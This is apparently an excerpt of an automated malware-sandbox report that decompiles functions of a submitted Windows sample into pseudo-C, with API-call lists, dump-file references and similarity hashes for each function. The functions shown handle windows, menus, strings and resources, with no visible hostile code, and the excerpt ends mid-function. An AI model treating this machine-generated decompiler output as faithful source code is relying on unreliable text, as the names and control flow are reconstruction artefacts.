                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				void* _t16;
                                                      				int _t17;
                                                      				int _t18;
                                                      				struct HWND__* _t19;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t33;
                                                      				void* _t35;
                                                      
                                                      				_t32 = __edi;
                                                      				_t35 = __ecx;
                                                      				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                      				if(_t25 == 0) {
                                                      					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                      					if(__eflags == 0) {
                                                      						L3:
                                                      						_t17 = E004037E3(0, _t25, _t32, _t35, _t39);
                                                      						L4:
                                                      						asm("sbb edx, edx");
                                                      						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                      						L11:
                                                      						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                      						return _t18;
                                                      					}
                                                      					__eflags = _a4;
                                                      					if(_a4 == 0) {
                                                      						_push(__edi);
                                                      						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                      						_t19 = GetFocus();
                                                      						__eflags = _t19 -  *(_t33 + 0x20);
                                                      						if(_t19 ==  *(_t33 + 0x20)) {
                                                      							SendMessageA( *(E00409C97(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                      						}
                                                      					}
                                                      					_t18 = E0040CA8B( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                      					goto L11;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                      					_t17 =  *(__ecx + 8);
                                                      					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                      					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                      						goto L4;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      				return _t16;
                                                      			}













                                                      APIs
                                                      • EnableMenuItem.USER32 ref: 0040498A
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetFocus.USER32 ref: 004049A1
                                                      • GetParent.USER32(?), ref: 004049AF
                                                      • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004049C2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                      • String ID:
                                                      • API String ID: 3849708097-0
                                                      • Opcode ID: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
                                                      • Instruction ID: 914c255c74ae2b2e161b517f63bea8142904b75b6db113dff41908d8fcf81d8c
                                                      • Opcode Fuzzy Hash: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
                                                      • Instruction Fuzzy Hash: F5113CF1100600AFDB209F60DC85A6BB7B5FBD4326B10C63EF286625A0C734AC45CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E0040A5C3(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t18;
                                                      				struct HWND__* _t20;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      				void* _t24;
                                                      				struct HWND__* _t25;
                                                      
                                                      				_t23 = __ecx;
                                                      				_t22 = __ebx;
                                                      				_t24 = GetTopWindow;
                                                      				_t16 = GetTopWindow(_a4);
                                                      				while(1) {
                                                      					_t25 = _t16;
                                                      					if(_t25 == 0) {
                                                      						break;
                                                      					}
                                                      					__eflags = _a24;
                                                      					if(__eflags == 0) {
                                                      						SendMessageA(_t25, _a8, _a12, _a16);
                                                      					} else {
                                                      						_t20 = E00409CBE(_t23, _t24, _t25, __eflags, _t25);
                                                      						__eflags = _t20;
                                                      						if(__eflags != 0) {
                                                      							_push(_a16);
                                                      							_push(_a12);
                                                      							_push(_a8);
                                                      							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                      							_push(_t20);
                                                      							E0040A2E8(_t22, _t24, _t25, __eflags);
                                                      						}
                                                      					}
                                                      					__eflags = _a20;
                                                      					if(_a20 != 0) {
                                                      						_t18 = GetTopWindow(_t25);
                                                      						__eflags = _t18;
                                                      						if(_t18 != 0) {
                                                      							E0040A5C3(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                      						}
                                                      					}
                                                      					_t16 = GetWindow(_t25, 2);
                                                      				}
                                                      				return _t16;
                                                      			}














                                                      APIs
                                                      • GetTopWindow.USER32(00000000), ref: 0040A5D1
                                                      • GetTopWindow.USER32(00000000), ref: 0040A610
                                                      • GetWindow.USER32(00000000,00000002), ref: 0040A62E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window
                                                      • String ID:
                                                      • API String ID: 2353593579-0
                                                      • Opcode ID: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
                                                      • Instruction ID: 6bb7837223b1437e7f35f4f841dbeb3d150c6d8cc2c7bce5033a1c3b76c9a84e
                                                      • Opcode Fuzzy Hash: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
                                                      • Instruction Fuzzy Hash: AC01ED3600161ABBCF126F559C04EDF3B36FF48350F054426F940651A1D73AC972EBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E0040EC5F(short* _a4) {
                                                      				char* _v0;
                                                      				int _v8;
                                                      				int _v16;
                                                      				void* __ebx;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				int _t6;
                                                      				char* _t7;
                                                      				void* _t12;
                                                      				char* _t13;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				short* _t20;
                                                      
                                                      				_t20 = _a4;
                                                      				if(_t20 != 0) {
                                                      					__imp__#7(_t20, _t16, _t12);
                                                      					_v8 = _t6;
                                                      					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
                                                      					_v0 = _t7;
                                                      					__imp__#150(0, _t7);
                                                      					_t13 = _t7;
                                                      					__eflags = _t13;
                                                      					if(__eflags == 0) {
                                                      						E004037AF(_t13, _t15, WideCharToMultiByte, 0, __eflags);
                                                      					}
                                                      					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
                                                      					return _t13;
                                                      				}
                                                      				return 0;
                                                      			}



















                                                      APIs
                                                      • SysStringLen.OLEAUT32(?), ref: 0040EC73
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040EC8B
                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0040EC93
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040ECB2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                      • String ID:
                                                      • API String ID: 3384502665-0
                                                      • Opcode ID: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
                                                      • Instruction ID: a8860d5d0e509bcf303a4908704158829630dd5dfdd3e8d3169bb9f7432348a3
                                                      • Opcode Fuzzy Hash: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
                                                      • Instruction Fuzzy Hash: 47F012761062287F93211BA79C4CCABBF9CFE9A3E5B10093AF549A2150D6799810C6F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042AC64(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                      				intOrPtr _t25;
                                                      				void* _t26;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t28 = __ebx;
                                                      				_t25 = _a16;
                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                      					_t26 = E0042A561(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      					goto L9;
                                                      				} else {
                                                      					_t35 = _t25 - 0x66;
                                                      					if(_t25 != 0x66) {
                                                      						__eflags = _t25 - 0x61;
                                                      						if(_t25 == 0x61) {
                                                      							L7:
                                                      							_t26 = E0042A64D(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      						} else {
                                                      							__eflags = _t25 - 0x41;
                                                      							if(__eflags == 0) {
                                                      								goto L7;
                                                      							} else {
                                                      								_t26 = E0042AB6C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      							}
                                                      						}
                                                      						L9:
                                                      						return _t26;
                                                      					} else {
                                                      						return E0042AAB3(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                      					}
                                                      				}
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                      • Instruction ID: 3dbc08a52ec38b7d7a761f0fe1270b82bedc95c96d3fe4623e25e7259ca750c8
                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                      • Instruction Fuzzy Hash: 8B017B3250015EBBCF125F85ED018EE3F22BF19344B888416FE1959130D23BC9B1EB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00409F82(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t9;
                                                      				struct HWND__* _t10;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t17;
                                                      				void* _t18;
                                                      
                                                      				_t14 = __ecx;
                                                      				_t13 = __ebx;
                                                      				_t9 = GetDlgItem(_a4, _a8);
                                                      				_t15 = GetTopWindow;
                                                      				_t16 = _t9;
                                                      				if(_t16 == 0) {
                                                      					L6:
                                                      					_t10 = GetTopWindow(_a4);
                                                      					while(1) {
                                                      						_t17 = _t10;
                                                      						__eflags = _t17;
                                                      						if(_t17 == 0) {
                                                      							goto L10;
                                                      						}
                                                      						_t10 = E00409F82(_t13, _t14, _t17, _a8, _a12);
                                                      						__eflags = _t10;
                                                      						if(_t10 == 0) {
                                                      							_t10 = GetWindow(_t17, 2);
                                                      							continue;
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      				} else {
                                                      					if(GetTopWindow(_t16) == 0) {
                                                      						L3:
                                                      						_push(_t16);
                                                      						if(_a12 == 0) {
                                                      							return E00409C97(_t13, _t14, _t18);
                                                      						}
                                                      						_t10 = E00409CBE(_t14, _t15, _t16, __eflags);
                                                      						__eflags = _t10;
                                                      						if(_t10 == 0) {
                                                      							goto L6;
                                                      						}
                                                      					} else {
                                                      						_t10 = E00409F82(__ebx, _t14, _t16, _a8, _a12);
                                                      						if(_t10 == 0) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				L10:
                                                      				return _t10;
                                                      			}














                                                      APIs
                                                      • GetDlgItem.USER32 ref: 00409F8D
                                                      • GetTopWindow.USER32(00000000), ref: 00409FA0
                                                        • Part of subcall function 00409F82: GetWindow.USER32(00000000,00000002), ref: 00409FE7
                                                      • GetTopWindow.USER32(?), ref: 00409FD0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$Item
                                                      • String ID:
                                                      • API String ID: 369458955-0
                                                      • Opcode ID: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
                                                      • Instruction ID: f6ea6eabe51ed2d5a48b12d105cf3c13206c2d8bb6ceeb41934ac94127644c0a
                                                      • Opcode Fuzzy Hash: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
                                                      • Instruction Fuzzy Hash: 89018F32505617B7CB222F519C00EDF3A58AF807E0F054036FD00F6292D739DD11A6A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E0042526C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t15;
                                                      				LONG* _t21;
                                                      				long _t23;
                                                      				void* _t31;
                                                      				LONG* _t33;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      
                                                      				_t35 = __eflags;
                                                      				_t29 = __edx;
                                                      				_t25 = __ebx;
                                                      				_push(0xc);
                                                      				_push(0x43f810);
                                                      				E00421418(__ebx, __edi, __esi);
                                                      				_t31 = E0042485D(__edx, __edi, _t35);
                                                      				_t15 =  *0x443df4; // 0xfffffffe
                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                      					E00422E2D(0xd);
                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                      					_t33 =  *(_t31 + 0x68);
                                                      					 *(_t34 - 0x1c) = _t33;
                                                      					__eflags = _t33 -  *0x443cf8; // 0x2351320
                                                      					if(__eflags != 0) {
                                                      						__eflags = _t33;
                                                      						if(_t33 != 0) {
                                                      							_t23 = InterlockedDecrement(_t33);
                                                      							__eflags = _t23;
                                                      							if(_t23 == 0) {
                                                      								__eflags = _t33 - 0x4438d0;
                                                      								if(__eflags != 0) {
                                                      									_push(_t33);
                                                      									E0041E18A(_t25, _t31, _t33, __eflags);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t21 =  *0x443cf8; // 0x2351320
                                                      						 *(_t31 + 0x68) = _t21;
                                                      						_t33 =  *0x443cf8; // 0x2351320
                                                      						 *(_t34 - 0x1c) = _t33;
                                                      						InterlockedIncrement(_t33);
                                                      					}
                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                      					E00425307();
                                                      				} else {
                                                      					_t33 =  *(_t31 + 0x68);
                                                      				}
                                                      				if(_t33 == 0) {
                                                      					E0041F916(_t25, _t29, _t31, 0x20);
                                                      				}
                                                      				return E0042145D(_t33);
                                                      			}










                                                      0x004252fd
                                                      0x0042528f
                                                      0x0042528f
                                                      0x0042528f
                                                      0x00425294
                                                      0x00425298
                                                      0x0042529d
                                                      0x004252a5

                                                      APIs
                                                        • Part of subcall function 0042485D: __getptd_noexit.LIBCMT ref: 0042485E
                                                        • Part of subcall function 0042485D: __amsg_exit.LIBCMT ref: 0042486B
                                                      • __amsg_exit.LIBCMT ref: 00425298
                                                      • __lock.LIBCMT ref: 004252A8
                                                      • InterlockedDecrement.KERNEL32(?), ref: 004252C5
                                                      • InterlockedIncrement.KERNEL32(02351320), ref: 004252F0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 2880340415-0
                                                      • Opcode ID: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
                                                      • Instruction ID: 724aaa48ea21f26d78a4a53a77eade52139c7390ef92faafb76bd8af03b18e74
                                                      • Opcode Fuzzy Hash: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
                                                      • Instruction Fuzzy Hash: 50017032B01A32E7CB11AB55B80674A7360AB05715F51016BF814A73D0CB38A9818FED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040C865(void* __ecx, CHAR* _a4) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HRSRC__* _t8;
                                                      				void* _t9;
                                                      				void* _t11;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				struct HINSTANCE__* _t17;
                                                      				void* _t18;
                                                      
                                                      				_t14 = 0;
                                                      				_t11 = 0;
                                                      				_t19 = _a4;
                                                      				_t18 = __ecx;
                                                      				if(_a4 == 0) {
                                                      					L4:
                                                      					_t16 = E0040C41C(_t11, _t18, _t11);
                                                      					if(_t11 != 0 && _t14 != 0) {
                                                      						FreeResource(_t14);
                                                      					}
                                                      					return _t16;
                                                      				}
                                                      				_t17 =  *(E0040DB94(0, 0, _t15, _t19) + 0xc);
                                                      				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                      				if(_t8 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t9 = LoadResource(_t17, _t8);
                                                      				_t14 = _t9;
                                                      				if(_t14 != 0) {
                                                      					_t11 = LockResource(_t14);
                                                      					goto L4;
                                                      				}
                                                      				return _t9;
                                                      			}
















                                                      APIs
                                                      • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C887
                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C893
                                                      • LockResource.KERNEL32(00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C8A0
                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C8BB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
                                                      • Instruction ID: 1cc108b070ddcadaf49700f58f1fb47de74f4529278b4a49e0f23a097ff97351
                                                      • Opcode Fuzzy Hash: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
                                                      • Instruction Fuzzy Hash: 00F062372012119BD7112BB65CC897BB6A8AFC5692705427AF905F2392DB389C05817D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004064EE() {
                                                      				intOrPtr _t16;
                                                      				struct HWND__* _t19;
                                                      				intOrPtr _t23;
                                                      				intOrPtr* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                      				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                      				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                      					E0040CA8B(_t23, 1);
                                                      				}
                                                      				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                      					EnableWindow( *(_t29 - 0x14), 1);
                                                      				}
                                                      				if( *(_t29 - 0x14) != 0) {
                                                      					_t19 = GetActiveWindow();
                                                      					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                      					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                      						SetActiveWindow( *(_t29 - 0x14));
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)( *_t28 + 0x60))();
                                                      				E00405F01(_t23, _t28, 0, _t28, _t34);
                                                      				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                      					FreeResource( *(_t29 - 0x18));
                                                      				}
                                                      				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                      				return E0041F7C2(_t16);
                                                      			}









                                                      APIs
                                                      • EnableWindow.USER32(?,00000001), ref: 0040650E
                                                      • GetActiveWindow.USER32 ref: 00406519
                                                      • SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
                                                      • FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543
                                                        • Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$ActiveEnable$FreeResource
                                                      • String ID:
                                                      • API String ID: 253586258-0
                                                      • Opcode ID: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
                                                      • Instruction ID: 4853af9af119085c85b499c513028b08372eaae9968efb4a3fc4ab9602832ae4
                                                      • Opcode Fuzzy Hash: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
                                                      • Instruction Fuzzy Hash: 55F04F30A00605DBCF21AF64DC455AEBBB1BF88705B55113AE503722E5C73A6D90CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0041CE14(intOrPtr _a4, intOrPtr _a8) {
                                                      				long _t4;
                                                      				long _t5;
                                                      				void* _t7;
                                                      				void* _t8;
                                                      				void* _t9;
                                                      				void* _t13;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_a4 == 0) {
                                                      					__eflags =  *0x446820;
                                                      					if( *0x446820 == 0) {
                                                      						_t5 = GetTickCount();
                                                      						 *0x446820 =  *0x446820 + 1;
                                                      						__eflags =  *0x446820;
                                                      						 *0x4433d8 = _t5;
                                                      					}
                                                      					_t4 = GetTickCount() -  *0x4433d8;
                                                      					__eflags = _t4 - 0xea60;
                                                      					if(_t4 > 0xea60) {
                                                      						__imp__CoFreeUnusedLibraries();
                                                      						_t4 = GetTickCount();
                                                      						 *0x4433d8 = _t4;
                                                      					}
                                                      					return _t4;
                                                      				}
                                                      				return E0041CDBD(_t7, _t8, _t9, _t13, _t14, _a8);
                                                      			}










                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 0041CE36
                                                      • GetTickCount.KERNEL32 ref: 0041CE43
                                                      • CoFreeUnusedLibraries.OLE32 ref: 0041CE52
                                                      • GetTickCount.KERNEL32 ref: 0041CE58
                                                        • Part of subcall function 0041CDBD: CoFreeUnusedLibraries.OLE32(00000000,0041CE9C,00000000), ref: 0041CE01
                                                        • Part of subcall function 0041CDBD: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0041CE9C), ref: 0041CE07
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                      • String ID:
                                                      • API String ID: 685759847-0
                                                      • Opcode ID: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
                                                      • Instruction ID: 38eb2e71dc98f28b912332c2f41d7ff22c59e4d9a07145cfe7d16bad1c32e9e8
                                                      • Opcode Fuzzy Hash: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
                                                      • Instruction Fuzzy Hash: 54E0E538944324ABD750BF24EC8879A7BA0AB4AB41F114837D44096274CB7879C1CE9E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E004169C9(intOrPtr* __ecx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t103;
                                                      				intOrPtr* _t104;
                                                      				signed int _t106;
                                                      				signed int _t118;
                                                      				intOrPtr* _t122;
                                                      				signed int _t138;
                                                      				signed int _t146;
                                                      				void* _t149;
                                                      				signed int _t150;
                                                      				signed int _t174;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      				void* _t182;
                                                      				signed int _t184;
                                                      				void* _t185;
                                                      				void* _t187;
                                                      
                                                      				_t186 = __ecx;
                                                      				_t146 = 0;
                                                      				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                      					__eflags =  *(__ecx + 0x40);
                                                      					if( *(__ecx + 0x40) == 0) {
                                                      						L9:
                                                      						_t149 = 0;
